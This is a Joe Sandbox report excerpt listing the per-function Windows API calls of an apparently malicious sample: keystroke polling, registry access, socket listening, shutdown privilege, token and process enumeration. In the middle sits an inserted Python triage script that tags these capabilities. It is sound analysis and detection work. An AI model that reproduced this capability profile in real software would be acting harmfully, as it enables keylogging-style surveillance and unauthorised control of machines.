                                                    • GetKeyState.USER32(000000A0), ref: 006B0139
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 006B0168
                                                    • GetKeyState.USER32(000000A1), ref: 006B0179
                                                    • GetAsyncKeyState.USER32(00000011), ref: 006B01A5
                                                    • GetKeyState.USER32(00000011), ref: 006B01B3
                                                    • GetAsyncKeyState.USER32(00000012), ref: 006B01DC
                                                    • GetKeyState.USER32(00000012), ref: 006B01EA
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 006B0213
                                                    • GetKeyState.USER32(0000005B), ref: 006B0221
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    APIs
                                                      • Part of subcall function 006D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006CFDAD,?,?), ref: 006D0E31
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006D04AC
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006D054B
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006D05E3
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 006D0822
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 006D082F
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1240663315-0
                                                    APIs
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • CoInitialize.OLE32 ref: 006C8403
                                                    • CoUninitialize.OLE32 ref: 006C840E
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,006E2BEC,?), ref: 006C846E
                                                    • IIDFromString.OLE32(?,?), ref: 006C84E1
                                                    • VariantInit.OLEAUT32(?), ref: 006C857B
                                                    • VariantClear.OLEAUT32(?), ref: 006C85DC
                                                    Strings
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 834269672-1287834457
                                                    APIs
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    APIs
                                                      • Part of subcall function 00654750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00654743,?,?,006537AE,?), ref: 00654770
                                                      • Part of subcall function 006B4A31: GetFileAttributesW.KERNEL32(?,006B370B), ref: 006B4A32
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 006B38A3
                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 006B394B
                                                    • MoveFileW.KERNEL32(?,?), ref: 006B395E
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 006B397B
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006B399D
                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 006B39B9
                                                    Strings
                                                    Similarity
                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 4002782344-1173974218
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 006BF440
                                                    • Sleep.KERNEL32(0000000A), ref: 006BF470
                                                    • _wcscmp.LIBCMT ref: 006BF484
                                                    • _wcscmp.LIBCMT ref: 006BF49F
                                                    • FindNextFileW.KERNEL32(?,?), ref: 006BF53D
                                                    • FindClose.KERNEL32(00000000), ref: 006BF553
                                                    Strings
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                    • String ID: *.*
                                                    • API String ID: 713712311-438819550
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __itow__swprintf
                                                    • String ID: 3cf$_f
                                                    • API String ID: 674341424-1617663849
                                                    • Opcode ID: 6b9bb71e90b0b2149116546ab65b1c82ade82b40579d8b221b7db4d20cd39dbd
                                                    • Instruction ID: 313aa3de88667e8332490b3f98fa28c85062342c1f6d2ca545c70e73dcb8a3b3
                                                    • Opcode Fuzzy Hash: 6b9bb71e90b0b2149116546ab65b1c82ade82b40579d8b221b7db4d20cd39dbd
                                                    • Instruction Fuzzy Hash: B322AE716083109FCB64DF24C891BAEB7E6AF84310F04491DF89A97391DB31EE09CB96
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: bd3c0f218a0f28516c94bf6b873662f2c4020d297828458b88db8591f55deca7
                                                    • Instruction ID: faa0bc69d78fbffdc0a4a83f6255c8a8ecb9719273cd7c529be8e61581dd27dc
                                                    • Opcode Fuzzy Hash: bd3c0f218a0f28516c94bf6b873662f2c4020d297828458b88db8591f55deca7
                                                    • Instruction Fuzzy Hash: 6A128B70A00609DFDF14DFA5D982AEEB7F6FF48300F108669E806A7251EB35AD15CB64
                                                    APIs
                                                      • Part of subcall function 006A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006A882B
                                                      • Part of subcall function 006A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006A8858
                                                      • Part of subcall function 006A87E1: GetLastError.KERNEL32 ref: 006A8865
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 006B51F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-194228
                                                    • Opcode ID: 4524dc64e6fd75452cd6e099f267b2d8c1bc94e4f3e595df6662237b668ce700
                                                    • Instruction ID: 88dfb7b03bac580494d9a5f88bfe44fd8f9119009049afcba5d31ec85a55c661
                                                    • Opcode Fuzzy Hash: 4524dc64e6fd75452cd6e099f267b2d8c1bc94e4f3e595df6662237b668ce700
                                                    • Instruction Fuzzy Hash: 0701FCF17A36115FE73863689C9BFFA735A9B05340F140425F943D21D2D9715D814794
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006C62DC
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C62EB
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 006C6307
                                                    • listen.WSOCK32(00000000,00000005), ref: 006C6316
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C6330
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 006C6344
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: 8382040b6e972d40cbdd87f8c00abb2a407e5637915f0aca05b7c4748d9bb03e
                                                    • Instruction ID: 580f11c6a6410e1701128820e48fb81e93374c6923b21078d8f27ca014f41b2d
                                                    • Opcode Fuzzy Hash: 8382040b6e972d40cbdd87f8c00abb2a407e5637915f0aca05b7c4748d9bb03e
                                                    • Instruction Fuzzy Hash: 66218D31A002049FCB10EF64D849FBEB7AAEF49721F14855DF81AA7391C770AD05CB65
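The two blocks above (the SeShutdownPrivilege/ExitWindowsEx function and the socket/bind/listen function) are the kind of entries worth pulling out of a long similarity listing automatically. The following is an added example, not part of the Joe Sandbox report: a small parser for this block layout that extracts each function's API calls (with the "Part of subcall" indirection kept), its API ID, String ID, Opcode ID and Instruction Fuzzy Hash, and tags functions whose imported names together indicate a capability. The capability map is this example's own grouping, and the sample input is constructed from the two blocks above with their "Associated" lines dropped.

```python
"""Parse Joe Sandbox per-function similarity blocks and flag capabilities.

Added example for triaging the function listing in this report. It is not
Joe Sandbox code, and the CAPABILITIES grouping below is this example's own.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two function blocks in the same layout as the listing
# above (values copied from this report, "Associated" lines left out).
SAMPLE = """\
APIs
  • Part of subcall function 006A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006A882B
  • Part of subcall function 006A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006A8858
  • Part of subcall function 006A87E1: GetLastError.KERNEL32 ref: 006A8865
• ExitWindowsEx.USER32(?,00000000), ref: 006B51F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
• Opcode ID: 4524dc64e6fd75452cd6e099f267b2d8c1bc94e4f3e595df6662237b668ce700
• Instruction ID: 88dfb7b03bac580494d9a5f88bfe44fd8f9119009049afcba5d31ec85a55c661
• Opcode Fuzzy Hash: 4524dc64e6fd75452cd6e099f267b2d8c1bc94e4f3e595df6662237b668ce700
• Instruction Fuzzy Hash: 0701FCF17A36115FE73863689C9BFFA735A9B05340F140425F943D21D2D9715D814794
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006C62DC
• WSAGetLastError.WSOCK32(00000000), ref: 006C62EB
• bind.WSOCK32(00000000,?,00000010), ref: 006C6307
• listen.WSOCK32(00000000,00000005), ref: 006C6316
• WSAGetLastError.WSOCK32(00000000), ref: 006C6330
• closesocket.WSOCK32(00000000,00000000), ref: 006C6344
Memory Dump Source
• Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
• Opcode ID: 8382040b6e972d40cbdd87f8c00abb2a407e5637915f0aca05b7c4748d9bb03e
• Instruction Fuzzy Hash: 66218D31A002049FCB10EF64D849FBEB7AAEF49721F14855DF81AA7391C770AD05CB65
"""

# One API call line: optional "Part of subcall function <addr>:" prefix,
# then Name.MODULE, optional (args), then "ref: <addr>". Some calls (e.g.
# GetLastError.KERNEL32 ref: ...) are printed without an argument list.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Similarity fields we keep. "Instruction Fuzzy Hash" is the last field of a
# block, so it doubles as the block terminator.
FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|Opcode ID|Instruction Fuzzy Hash):\s*(?P<val>.*?)\s*$"
)

# Capability tags: all listed names must appear in the same function
# (directly or via a subcall). This grouping is the example's own choice.
CAPABILITIES = {
    "privilege-adjust": {"LookupPrivilegeValueW", "AdjustTokenPrivileges"},
    "shutdown": {"ExitWindowsEx"},
    "tcp-listen": {"socket", "bind", "listen"},
    "process-enum": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "token-query": {"GetTokenInformation"},
    "dynamic-import": {"LoadLibraryA", "GetProcAddress"},
    "http-read": {"InternetQueryDataAvailable", "InternetReadFile"},
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall: Optional[str]  # callee address when the call is reached indirectly


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    api_id: str = ""
    strings: list = field(default_factory=list)  # String ID split on "$"
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""

    def api_names(self):
        return {c.name for c in self.calls}

    def capabilities(self):
        """Tags whose whole API set is present in this function."""
        names = self.api_names()
        return sorted(tag for tag, need in CAPABILITIES.items() if need <= names)


def parse_blocks(text):
    """Split a listing into FunctionBlock objects, one per function."""
    blocks, cur = [], FunctionBlock()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        f = FIELD_RE.match(line)
        if not f:
            continue  # headers, Source File, Associated, IDs we do not keep
        key, val = f["key"], f["val"]
        if key == "API ID":
            cur.api_id = val
        elif key == "String ID":
            cur.strings = [s for s in val.split("$") if s]
        elif key == "Opcode ID":
            cur.opcode_id = val
        elif key == "Instruction Fuzzy Hash":
            cur.instruction_fuzzy_hash = val
            blocks.append(cur)
            cur = FunctionBlock()
    return blocks


def triage(text):
    """(opcode_id, capability tags, strings) for every block that trips a tag."""
    return [(b.opcode_id, b.capabilities(), b.strings)
            for b in parse_blocks(text) if b.capabilities()]


if __name__ == "__main__":
    for opcode_id, caps, strings in triage(SAMPLE):
        print(opcode_id[:16], caps, strings)
```

Feeding the whole "Similarity" section of a report through `triage()` gives a short list of Opcode IDs to open in the IDA snapshot first; the Opcode ID and Instruction Fuzzy Hash fields are what carry over between samples, so the same tags can be matched against an earlier report of the same family.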
                                                    APIs
                                                      • Part of subcall function 00670DB6: std::exception::exception.LIBCMT ref: 00670DEC
                                                      • Part of subcall function 00670DB6: __CxxThrowException@8.LIBCMT ref: 00670E01
                                                    • _memmove.LIBCMT ref: 006A0258
                                                    • _memmove.LIBCMT ref: 006A036D
                                                    • _memmove.LIBCMT ref: 006A0414
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1300846289-0
                                                    • Opcode ID: fa6bdc3e1dc6847b373774702625b9f4d8659293861a8a853800385639fc8351
                                                    • Instruction ID: 93a1c9367d7ef38b2598daebae4e293370885df9549949f0d1410b39e5c64eb0
                                                    • Opcode Fuzzy Hash: fa6bdc3e1dc6847b373774702625b9f4d8659293861a8a853800385639fc8351
                                                    • Instruction Fuzzy Hash: 7802CF70A00209DFDF04DF64D982AAEBBB6EF45300F1480A9E80ADB391EB35DD55CB95
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 006519FA
                                                    • GetSysColor.USER32(0000000F), ref: 00651A4E
                                                    • SetBkColor.GDI32(?,00000000), ref: 00651A61
                                                      • Part of subcall function 00651290: DefDlgProcW.USER32(?,00000020,?), ref: 006512D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ColorProc$LongWindow
                                                    • String ID:
                                                    • API String ID: 3744519093-0
                                                    • Opcode ID: 5957d3b5d40ed824244135c5e9b9f22d59d0700f308233e4e3d8dd75249cd476
                                                    • Instruction ID: d88f879618d14db445c80d3dfd4ca8c164d864869e7b32beb1e9353cca54f8f2
                                                    • Opcode Fuzzy Hash: 5957d3b5d40ed824244135c5e9b9f22d59d0700f308233e4e3d8dd75249cd476
                                                    • Instruction Fuzzy Hash: 3DA12474102585BAEB29AB288C55FFB255FDB43343F14421EF802D93D2DA248D0AD3BA
                                                    APIs
                                                      • Part of subcall function 006C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006C7DB6
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 006C679E
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C67C7
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 006C6800
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C680D
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 006C6821
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 99427753-0
                                                    • Opcode ID: 19114121a588f70f3aa8979a30cb74b699dad3d73ef76ac494fce8bcd8f10026
                                                    • Instruction ID: 1192a45eb53412dbdd86a8cde048eb813e3bc28bbb22d123118d8e571fa0af36
                                                    • Opcode Fuzzy Hash: 19114121a588f70f3aa8979a30cb74b699dad3d73ef76ac494fce8bcd8f10026
                                                    • Instruction Fuzzy Hash: 6F41AF75A00200AFEB90AF24CC86F7E77AADF45714F04855CFD56AB3D2CA709D048BA5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 3284df5f321eb014a7f4668a83f7c6a6e6651f9e1b5254f649b0330afe9c0389
                                                    • Instruction ID: f9a3abc939944ba33ad5d21a054bf7f247e460689df252be636972ab1bf214e1
                                                    • Opcode Fuzzy Hash: 3284df5f321eb014a7f4668a83f7c6a6e6651f9e1b5254f649b0330afe9c0389
                                                    • Instruction Fuzzy Hash: 11110431B019106FDB206F26DC44AAE7B9BEF843A1B01442AF847D7741DBB0DD018AA4
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006A80C0
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006A80CA
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006A80D9
                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006A80E0
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006A80F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 2fbd7342c8f1566b9790ef255cbf66001a55b1e40a61be4e4cef423c0f30f477
                                                    • Instruction ID: e292b26cc9cd01f714c7e5909f9fb3913f7de6e0a1b7302e0b219f6319606145
                                                    • Opcode Fuzzy Hash: 2fbd7342c8f1566b9790ef255cbf66001a55b1e40a61be4e4cef423c0f30f477
                                                    • Instruction Fuzzy Hash: DBF06231641205AFEB101FA5EC8DEA73BBEEF4A755B040026F946C7250CB619D51DEA0
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00654AD0), ref: 00654B45
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00654B57
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: db0e6ffb52e31530759999aa7eababe4ffac11945022ef3cdc3bd07a902e27df
                                                    • Instruction ID: 98fd411db6ec72ac7758346b16426b9f8c5d4b3941ae9d3efa64bcda3016fb90
                                                    • Opcode Fuzzy Hash: db0e6ffb52e31530759999aa7eababe4ffac11945022ef3cdc3bd07a902e27df
                                                    • Instruction Fuzzy Hash: B4D01734E10713CFD7209F32EC28B4676E6AF05396F16887B9897D6250EBB0E8C4CA54
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 006CEE3D
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 006CEE4B
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 006CEF0B
                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 006CEF1A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                    • String ID:
                                                    • API String ID: 2576544623-0
                                                    • Opcode ID: fed7e8a1486e838ad23f6c22cd94452fb5168b525ec6d4f3bfc609c799bc4c8d
                                                    • Instruction ID: 8669c85d259f1493cb1e61db31d917d64afe7c9e48c6f8b439678f9cc70d44a8
                                                    • Opcode Fuzzy Hash: fed7e8a1486e838ad23f6c22cd94452fb5168b525ec6d4f3bfc609c799bc4c8d
                                                    • Instruction Fuzzy Hash: 9C51AD71504301AFD350EF20DC85EABB7E9EF88750F10492DF996972A1EB70E908CB96
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006AE628
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: ($|
                                                    • API String ID: 1659193697-1631851259
                                                    • Opcode ID: cb9cdd3ec9572cb723df8eb2d53577cc5edc9488a1bb1186039745afbab3e2f4
